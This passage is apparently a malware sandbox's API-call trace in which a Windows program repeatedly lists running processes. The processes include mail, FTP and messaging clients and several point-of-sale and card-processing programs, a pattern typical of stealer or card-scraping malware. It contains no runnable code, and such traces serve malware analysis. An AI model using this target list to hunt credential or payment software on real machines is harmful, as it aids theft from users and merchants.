lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0242.706] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0242.708] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0242.709] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0242.711] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0242.713] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0242.714] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0242.735] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0242.737] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0242.739] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0242.740] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0242.742] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0242.744] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0242.746] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0242.750] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0242.752] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0242.754] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0242.755] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0242.757] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0242.758] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0242.760] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0242.766] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0242.767] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0242.769] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0242.771] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0242.772] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0242.774] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0242.776] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0242.777] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0242.831] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0242.834] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0242.836] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0242.838] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.941] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.944] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0242.946] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xd24, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0242.948] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0242.953] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0242.955] CloseHandle (hObject=0x17b0) returned 1 [0242.955] Sleep (dwMilliseconds=0x64) [0243.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0243.081] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.083] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.085] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.087] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.095] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.097] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.099] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.101] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.103] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.105] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.198] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.200] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.202] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.204] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.206] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.208] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.210] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.212] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.214] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.219] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.222] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0243.223] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0243.225] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.227] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0243.229] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0243.284] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0243.286] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0243.288] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.290] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0243.292] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0243.299] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0243.301] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0243.303] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0243.306] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0243.308] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0243.313] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0243.315] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0243.316] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0243.318] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0243.319] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0243.321] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0243.323] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0243.324] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0243.379] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0243.380] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, 